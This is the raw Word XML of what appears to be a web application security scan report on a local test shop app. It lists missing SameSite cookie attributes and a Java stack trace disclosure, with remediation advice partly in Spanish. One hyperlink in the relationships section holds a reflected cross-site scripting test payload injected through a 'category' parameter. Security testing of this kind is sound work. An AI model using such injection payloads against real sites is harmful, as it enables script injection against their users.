        <w:t xml:space="preserve">When cookies lack the SameSite attribute, Web browsers may apply different and sometimes unexpected defaults. It is therefore recommended to add a SameSite attribute with an appropriate value of either "Strict", "Lax", or "None".</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http://192.168.1.22:8888/changePassword</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Cookie was set with:</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Set-Cookie: JSESSIONID=BCE924571F8AE2173E484287DD0A5E90; Path=/; HttpOnly</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This cookie has the following issues:</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 - Cookie without SameSite attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000344">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When cookies lack the SameSite attribute, Web browsers may apply different and sometimes unexpected defaults. It is therefore recommended to add a SameSite attribute with an appropriate value of either "Strict", "Lax", or "None".</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http://192.168.1.22:8888/</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Cookie was set with:</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Set-Cookie: JSESSIONID=734B8C5C4C41DF57617489C5A4D407A4; Path=/; HttpOnly</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This cookie has the following issues:</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 - Cookie without SameSite attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000351">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When cookies lack the SameSite attribute, Web browsers may apply different and sometimes unexpected defaults. It is therefore recommended to add a SameSite attribute with an appropriate value of either "Strict", "Lax", or "None".</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http://192.168.1.22:8888/fonts/</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Cookie was set with:</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Set-Cookie: JSESSIONID=FFB04A5FFF4808EE62DAA203D7047F36; Path=/; HttpOnly</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This cookie has the following issues:</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 - Cookie without SameSite attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When cookies lack the SameSite attribute, Web browsers may apply different and sometimes unexpected defaults. It is therefore recommended to add a SameSite attribute with an appropriate value of either "Strict", "Lax", or "None".</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http://192.168.1.22:8888/sendEmail</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Cookie was set with:</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Set-Cookie: JSESSIONID=5A45012D3648E7E6F027150F80B11793; Path=/; HttpOnly</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This cookie has the following issues:</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 - Cookie without SameSite attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000036B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When cookies lack the SameSite attribute, Web browsers may apply different and sometimes unexpected defaults. It is therefore recommended to add a SameSite attribute with an appropriate value of either "Strict", "Lax", or "None".</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http://192.168.1.22:8888/orders</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Cookie was set with:</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Set-Cookie: JSESSIONID=5498A0A958C73230EA1F0F1F8DFC0341; Path=/; HttpOnly</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This cookie has the following issues:</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 - Cookie without SameSite attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000378">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When cookies lack the SameSite attribute, Web browsers may apply different and sometimes unexpected defaults. It is therefore recommended to add a SameSite attribute with an appropriate value of either "Strict", "Lax", or "None".</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http://192.168.1.22:8888/products</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Cookie was set with:</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Set-Cookie: JSESSIONID=C46ADE603BE3E944C7FA04570EA847E2; Path=/; HttpOnly</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This cookie has the following issues:</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 - Cookie without SameSite attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000385">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When cookies lack the SameSite attribute, Web browsers may apply different and sometimes unexpected defaults. It is therefore recommended to add a SameSite attribute with an appropriate value of either "Strict", "Lax", or "None".</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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="1d1c29"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w3blfuwf3sv1" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="1d1c29"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack Trace Disclosure (Java) -&gt;</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pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE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pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-248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pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000390">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:before="0" w:line="308.5714285714286" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="1d1c29"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="1d1c29"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">La aplicación web ha generado un mensaje de error que incluye información confidencial sobre su entorno, usuarios o datos asociados.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000391">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:before="0" w:line="308.5714285714286" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="202124"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000392">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:before="0" w:line="308.5714285714286" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="202124"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="1d1c29"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">El seguimiento de la pila puede revelar información potencialmente confidencial, como: rutas de archivos físicos de archivos relevantes, fragmentos de código fuente, información de la versión de varios paquetes, información de la base de datos, mensajes de error.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000393">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="202124"/>
                <w:shd w:fill="f8f9fa" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039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pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>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rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000397">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="1d1c29"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Se recomienda manejar las excepciones internamente y no mostrar errores que contengan información potencialmente confidencial para un usuario.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000398">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_beko2kfd24xi" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Git -&gt;</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hyperlink r:id="rId73">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Alesander21789/Armazon</w:t>
        </w:r>
      </w:hyperlink>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sectPr>
      <w:headerReference r:id="rId7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53.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.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30.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.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56.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Alesander21789/Armazon" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unpocodejava.com/2011/06/24/como-evitar-cross-site-scripting-xss-con-spring-mvc/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.22:8888/products/;jsessionid=A50FC5E8699A6B7819C4FE14B27ABC42?category='%22--%3e%3c/style%3e%3c/scRipt%3e%3cscRipt%3ealert(0x007FB0)%3c/scRipt" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.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